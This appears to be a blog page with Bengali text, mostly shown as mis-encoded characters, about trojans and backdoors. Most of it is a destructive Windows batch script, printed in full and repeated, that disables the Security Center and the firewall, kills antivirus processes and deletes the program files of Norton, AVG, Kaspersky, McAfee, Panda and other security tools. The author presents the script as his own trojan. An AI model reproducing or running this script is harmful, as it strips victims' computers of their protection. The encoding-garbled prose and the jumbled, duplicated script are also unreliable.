del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --
than save.carefully don"t open bat file.
@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --
TROJAN INJECTING AND TROJAN BACKDOR.......
āĻ্āϰোāĻাāύ āĻāϰ āĻŦ্āϝাāĻ āĻĄোāϰ āĻšāϞ āĻĻুāĻি āĻĒāĻĻ্āϧāϤি āϝাāϰ āĻŽাāϧ্āϝāĻŽে āĻāĻāĻāύ āĻš্āϝাāĻাāϰ āĻোāύ āϏিāϏ্āĻেāĻŽ āĻ āĻĒ্āϰāĻŦেāĻļ āĻāϰāϤে āĻĒাāϰেāύ ।āϏাāϧাāϰāύāϤ āĻŦ্āϝাāĻ āĻĄোāϰ āĻŦা āĻ্āϰোāĻাāύ āĻāĻāĻি āϏিāϏ্āĻেāĻŽ āĻ āĻ āύ্āϝ āĻোāύ āĻĒ্āϰোāĻ্āϰাāĻŽ āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻĒ্āϰāĻŦেāĻļ āĻāϰে ।āĻāĻĨিāĻাāϞ āĻš্āϝাāĻাāϰ āϏাāϧাāϰāύ āĻাāĻŦে āĻĒāϰীāĻ্āώা āĻāϰাāϰ āĻāύ্āϝ āĻāĻুāϞো āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে āĻĨাāĻেāύ । āĻāĻ āĻĻুāĻি āĻšāϞ āĻŽ্āϝাāϞāĻā§াāϰ āĻāϰ āĻāĻāĻি āϰুāĻĒ āϝা āĻ āύ্āϝ āĻোāύ āϏাāϰ্āĻাāϰ āĻ āĻ āύ্āϝ āĻĢাāĻāϞ āĻāϰ āĻŽাāϧ্āϝāĻŽে āϝাāĻŦাāϰ āĻেāώ্āĻা āĻāϰে ।
āĻāϰ āĻŦ্āϝাāĻ āĻĄোāϰ āĻŦāϞāϤে āĻŦোāĻাāύো āĻšā§ āĻāĻāĻি āĻĒāĻĨ āϤৈāϰি āĻāϰা āϝাāϰ āĻŽাāϧ্āϝāĻŽে āĻ্āϰোāĻাāύ āĻোāύ āϏিāϏ্āĻেāĻŽ āĻ āĻĒ্āϰāĻŦেāĻļ āĻāϰে। āϏাāϧাāϰāύāϤ āĻ্āϰোāĻাāύ āĻোāύ āĻ āύ্āϝ āĻāĻŦি āĻŦা āĻŽিāĻāĻিāĻ āĻĢাāĻāϞ āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻā§িā§ে āϝাā§ । āĻāϤে Steganography āĻĒāĻĻ্āϧāϤি āĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰা āĻšā§ । āĻāĻি āϏāĻŽ্āĻĒāϰ্āĻে āύা āϝাāύāϞে āĻāĻŽি āĻ āύিā§ে āϞিāĻেāĻি । āϏেāĻি āĻĒā§ে āύিāĻŦেāύ ।। āϏাāϧাāϰāύ āĻাāĻŦে āĻ্āϰোāĻাāύ āĻā§াāύোāϰ āϏāĻŦāĻĨেāĻে āϏāĻšāĻ āĻāĻĒাā§ āĻšāϞ āĻŦ্āϝাāĻ āĻĢাāĻāϞ āĻŦা āĻāĻে .exe āϤে āϰুāĻĒাāύ্āϤāϰ āĻāϰে āĻāύ্āϏāĻāϞাāϰ āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻā§িā§ে āĻĻেā§া । āĻāϤে āĻš্āϝাāĻাāϰ āϰা āĻŦিāĻিāύ্āύ āϧāϰāύেāϰ GUI āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰেāύ āĻ āύ্āϝ āĻĻেāϰ āĻāĻৃāώ্āĻ āĻāϰাāϰ āĻāύ্āϝ ।āĻā§েāĻāĻি āĻāĻŽāύ āĻ্āϰোāĻাāύ :
BackOrifice
Deep Throat
NetBus
Whack a mole
Girlfriend
Masters Paradise
āĻāĻুāϞāϰ āĻŽāϧ্āϝে āϏāĻŦāĻĨেāĻে āĻŦিāĻĒāĻĻāĻāύāĻ āĻšāĻ্āĻে Girlfriend āĻāĻŦং Netbus । āĻাāϰāύ āĻāĻুāϞো āĻŦ্āϝাāĻ āĻĢাāĻāϞ āĻāϰ āĻŽাāϧ্āϝāĻŽে āϤৈāϰি āĻāϰা āϝাā§ । āĻāĻŦং āĻোāĻĄেāϰ āĻā§েāĻāĻি āϞাāĻāύ āĻĒāϰিāĻŦāϰ্āϤāύ āĻāϰে āĻĻিāϞেāĻ āĻĻুāϰ্āϧāϰ্āώ āĻাāĻāϰাāϏ āĻ āĻĒāϰিāύāϤ āĻšā§ । āĻāĻĒāύি āϝāĻĻি āĻš্āϝাāĻাāϰ āĻšāϤে āĻাāύ āĻŦা āϏিāĻিāĻāϰিāĻি āύিā§ে āĻাāĻ āĻāϰāϤে āĻাāύ āĻāĻĒāύাāĻে āĻ āĻŦāĻļ্āϝāĻ āĻāĻুāϞো āύিā§ে āĻাāĻ āĻāϰāϤে āĻšāĻŦে । āĻিāύ্āϤু āύিāĻেāϰ āĻāĻŽ্āĻĒিāĻāĻাāϰ āĻ āĻুāϞো āύিā§ে āĻাāĻাāĻাāĻি āύা āĻāϰে āĻোāύ āĻাāϰ্āĻুā§াāϞ āĻĒāϰিāĻŦেāĻļ āϤৈāϰি āĻāϰাāĻ āĻাāϞ । āϝেāĻŽāύ āϝাāϰা Comodo āĻāϰ āĻাāϰ্āĻুā§াāϞ āϏিāĻিāĻāϰিāĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰেāύ āϤাāϰা āϝাāύেāύ । āĻāĻ āĻাāĻāϰাāϏ āĻুāϞো āύিā§ে āĻাāĻ āĻāϰা āĻāϤāĻা āĻŦিāĻĒāĻĻāĻāύāĻ ।
āĻ্āϰোāĻাāύ āĻāϰ āĻĒ্āϰāĻাāϰāĻেāĻĻ
āĻŦিāĻিāύ্āύ āϧāϰেāύেāϰ āĻ্āϰোāĻাāύ āĻāĻে । āϏেāĻুāϞāϰ āĻā§েāĻāĻি āύিāĻে āϤুāϞে āϧāϰা āĻšāϞ :
Remote Access Trojans : āĻোāύ āϏিāϏ্āĻেāĻŽ āĻ āϰিāĻŽোāĻ āĻ ্āϝাāĻ্āϏেāϏ āĻĒেāϤে āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰা āĻšā§
Data Sending Trijans : āĻāĻি āϏাāϧাāϰāύāϤ āĻĄাāĻা āĻুঁāĻে āĻŦেāϰ āĻāϰে āĻš্āϝাāĻাāϰ āĻāϰ āĻাāĻে āϤা āĻĒাāĻ িā§ে āĻĻেā§ ।
Destructive Trojans: āĻāϰ āϏাāĻšাāϝ্āϝে āĻāĻŽ্āĻĒিāĻāĻাāϰ āĻāϰ āĻ্āώāϤি āĻāϰা āĻšā§ ।
FTP trojans: āĻāĻিāĻে āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰāϤে āĻš্āϝাāĻাāϰ āϰা port 21 āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে āĻĨাāĻেāύ ।
SSDT: āĻāĻিāϰ āĻĒূāϰ্āĻŖāϰূāĻĒ āĻāĻĒāύাāϰা āĻাāĻ āĻļুāύāϞেāĻ āĻŦুāĻāϤে āĻĒাāϰāĻŦেāύ । āĻāϰ āĻŽাāϧ্āϝāĻŽে āĻোāύ āύিāϰ্āĻĻিāώ্āĻ āĻŦা āĻ āύেāĻāĻুāϞ antivirus āĻĒ্āϰোāĻ্āϰাāĻŽ āĻে āĻ āĻেāĻ āĻāϰে āĻĻেā§া āĻšā§ ।
āĻā§েāĻāĻি āĻ্āϰোāĻাāύ āĻĒ্āϰোāĻ্āϰাāĻŽ
Troj_OAJ
āĻāĻ āĻ্āϰোāĻাāύ āĻি āϝে āĻোāύ āύোāĻāĻĒ্āϝাāĻĄ āĻĢাāĻāϞ āĻে āĻাāϰāĻেāĻ āĻāϰে । āĻāϰāĻĒāϰ āϏেāĻিāĻে word āĻĢāϰāĻŽেāĻ āĻĒāϰিāĻŦāϰ্āϤāύ āĻāϰে note.com āĻ āύিā§ে āϝাā§ । āĻāϰāĻĒāϰ āϏেāĻি windows āĻāϰ āύোāĻāĻĒ্āϝাāĻĄ āĻĢোāϞ্āĻĄাāϰ āĻ āĻāĻĒি āĻšā§ । āĻāϰāĻĒāϰ āĻāĻĒāύি āϝāϤāĻŦাāϰ āύোāĻāĻĒ্āϝাāĻĄ āĻুāϞāĻŦেāύ āϤāϤāĻŦাāϰ āĻāĻ āĻাāĻāϰাāϏ āĻি āĻāĻ্āĻিāĻ āĻšāĻŦে ।
Donald Duck
āĻāĻি āĻāĻāĻি āĻŦ্āϝাāĻ āĻĄোāϰ āĻ্āϰোāĻাāύ । āĻāĻি āĻš্āϝাāĻাāϰ āĻে āϝেāĻোāύো āϏিāϏ্āĻেāĻŽ āĻ āĻĒুāϰāĻĒāϰি āύিā§āύ্āϤ্āϰāύ āĻāύে āĻĻেā§ । āĻāĻাāϰ āϏাāĻĨে āĻāĻāĻি āĻি āϞāĻাāϰ āĻāĻŦং āϰেāĻিāϏ্āĻ্āϰি āĻāĻĄিāĻ āĻāϰাāϰ āĻĒ্āϰāĻ্āϰাāĻŽ āĻĨাāĻে ।āĻāϰ āϏাāĻšাāϝ্āϝে āϏিāĻĄি āĻŦা āĻĄিāĻিāĻĄি āϰāĻŽ āĻোāϞা āĻŦা āĻŦāύ্āϧ āĻāϰাāĻ āϏāĻŽ্āĻāĻŦ āĻšā§ । āĻāĻি āĻāĻ্āĻেāĻ্āĻ āĻāϰāϤে āĻš্āϝাāĻাāϰ23476 āĻ ā§¨ā§Šā§Ēā§ā§ āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে āĻĨাāĻেāύ
CyberSpy
āĻāĻি āĻŽূāϞāϤ āĻāĻāĻি āϏ্āĻĒাāĻ āĻĒ্āϰোāĻ্āϰাāĻŽ । āĻāĻি āϰেāĻিāϏ্āĻ্āϰি āϤে āύিāĻেāĻে āĻāύ্āĻ্āϰি āĻāϰে āύেā§। āϝাāϰ āĻĢāϞে āĻāύ্āĻিāĻাāĻāϰাāϏ āĻĻিā§ে āĻĄিāϞিāĻ āĻāϰে āĻĻিāϞেāĻ āĻāĻŽ্āĻĒিāĻāĻাāϰ āϰিāĻŦুāĻ āĻāϰāϞে āĻāĻŦাāϰ āĻāĻি āĻāĻ্āĻিāĻ āĻšā§ে āϝাā§ ।
Firekill 2000
āĻāĻ āĻ্āϰোāĻাāύ āĻি āĻŽাāϰাāϤ্āϤāĻ । āĻāĻি āϏāĻŦ āϧāϰāύেāϰ āĻĢাā§াāϰāĻā§াāϞ , āĻāύ্āĻিāĻাāĻāϰাāϏ āĻে disable āĻāϰে āĻĻিāϤে āϏāĻ্āώāĻŽ । āĻāĻŽāύāĻি āĻāĻি āϏিāĻিāĻāϰিāĻি āϏāĻĢāĻāĻā§্āϝাāϰ āĻāϰ āύিāϰাāĻĒāϤ্āϤা āĻে āϧ্āĻŦংāϏ āĻāϰāϤে .dll āĻĢাāĻāϞ āĻে āĻĄিāϞিāĻ āĻāϰে āĻĻেā§ । āϤāĻāύ āϏিāϏ্āĻেāĻŽ āĻāĻŦাāϰ āϏেāĻāĻāĻĒ āĻĻিāϤে āĻšā§ ।
āĻāĻাā§া āĻāϰ āĻ āύেāĻ āĻ্āϰোāĻাāύ āĻĒ্āϰোāĻ্āϰাāĻŽ āĻāĻে । āĻ āύেāĻ āĻ্āϰোāĻাāύ Netcat āĻāϰ āϏাāĻšাāϝ্āϝে launch āĻāϰা āĻšā§ । āĻāĻŦাāϰ āĻ āύেāĻ āĻ্āϰোāĻাāύ āϏাāϰ্āĻাāϰ āϰুāĻিং āĻāϰে āĻāĻ্āĻেāĻ্āĻ āĻāϰা āĻšā§ ।
āĻāĻāĻি āĻ্āϰোāĻাāύ āĻাāĻāϰাāϏ
āĻāĻি āĻāĻŽাāϰ āύিāĻেāϰ āĻোāĻĄ āĻāϰা āĻāĻāĻি āĻোāĻ āĻ্āϰোāĻাāύ । āĻāĻি āĻāύ্āĻিāĻাāĻāϰাāϏ āĻāϰ āϏিāĻিāĻāϰিāĻি āĻে āϰুāĻে āĻĻিāϤে āĻĒাāϰāĻŦে । āĻāĻি āĻŽূāϞāϤ āĻāĻĒāύাāϰ āĻā§িāύ্āĻĻāĻāϏ āĻāϰ āĻĢাā§াāϰ āĻā§াāϞ āĻ āĻāύ্āĻিāĻাāĻāϰাāϏ āĻāϰ safe guard āĻে āϰুāĻে āĻĻেāĻŦে । āĻāĻিāϰ āĻāύ্āĻাāϰāĻĢেāϏ āϏāĻŦুāĻ āϰāĻেāϰ।
@ echo off
_Rashed Hasan_
∙ rem –
colour Db 03
∙ rem Permanently Kill Anti-Virus
∙ net stop “Security Center”
netsh firewall set opmode mode=disable ∙ tskill /A av* ∙
tskill /A fire*
tskill /A [...].
_BCA_
āĻāĻĒāύাāĻĻেāϰāĻে āĻāϰ āĻ āĻāĻāĻি āĻŦিāϧ্āĻŦংāϏী āĻ্āϰোāĻাāύ āĻāϰ āϞিāĻ্āĻ āĻĻিāϤে āĻĒাāϰি । āĻিāύ্āϤু āϏেāĻি āĻāĻŽ্āĻĒিāĻāĻাāϰ āĻ āϰাāύ āĻāϰāĻŦেāύ āύা । āĻāĻāĻি āϏāĻšāĻ āĻ্āϰিāĻ āĻšāĻ্āĻে āĻāĻĒি āĻĒেāϏ্āĻিং āϏাāĻāĻ āϝেāĻŽāύ http://www.pastebin.com āĻ āϝেā§ে āĻĒেāϏ্āĻ āĻāϰে āϏেāĻ āĻāϰāĻŦেāύ। āϏেāĻি āϝāĻĻি āĻোāύ āĻাāĻāϰাāϏ āĻšā§ āϤāĻŦে āĻĻেāĻāϤে āĻĒাāĻŦেāύ āĻāĻĒāύাāϰ āĻāύ্āĻিāĻাāĻāϰাāϏ āϏিāĻিāĻāϰিāĻি warning āĻĻেāĻŦে। āĻāϰ āϏেāĻ āϞিāĻ্āĻ āĻ āĻĒ্āϰāĻŦেāĻļ āĻāϰāϤে āĻেāϞে āĻāĻĒāύাāϰ āĻŦ্āϰাāĻāϝাāϰ āĻĨেāĻŽে āϝাāĻŦে ।
āĻāĻ āĻাāĻāϰাāϏ āĻি āĻোāύ āĻ āĻŦāϏ্āĻĨাāϤেāĻ āϰাāύ āĻāϰāĻŦেāύ āύা । āĻāĻি āĻাāϰāϤেāϰ āĻāĻāĻāύ āϏিāĻিāĻāϰিāĻি āĻāĻ্āϏāĻĒাāϰ্āĻ āĻāϰ āĻোāĻĄ āĻāϰা
http://www.breakthesecurity.com/2010/12/how-to-disabledelete-your-victims.html
āĻŦাঁāĻাāϰ āĻিāĻু āĻāĻĒাā§
> āĻāĻĒāύি āϝে āĻāύ্āĻিāĻাāĻāϰাāϏ āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে āĻĨাāĻুāύ āύা āĻেāύ āϏেāĻি āĻāĻĒ āĻু āĻĄেāĻ āĻĨাāĻāϤে āĻšāĻŦে ।
> āϏāύ্āĻĻেāĻš āĻāύāĻ āĻোāύ āĻুāϞ āĻŦা āϞিāĻ্āĻ āĻ āĻ্āϞিāĻ āĻāϰāĻŦেāύ āύা ।
> āĻāĻĒāύাāϰ antivirus āĻāϰ āĻĒাāĻļাāĻĒাāĻļি anti spam āĻ anti rootkit āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰāĻŦেāύ । āĻāĻŽি āĻŦāϞāĻŦ āĻ ্āϝাāύ্āĻিāĻাāĻāϰাāϏ āĻāϰ āϏাāĻĨে āĻāĻĒāύি kaspersky āĻāϰ TDS killer āĻুāϞ āĻী āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰāϤে āĻĒাāϰেāύ । āĻāĻি āĻĒুāϰো āĻĒুāϰি āĻĒোāϰ্āĻেāĻŦāϞ āĻāĻāĻি āĻুāϞ ।
āϤাāĻšāϞে āĻāĻ āĻāĻ āĻĒāϰ্āϝāύ্āϤāĻ āĻিāϞ ।
Subscribe to:
Comments (Atom)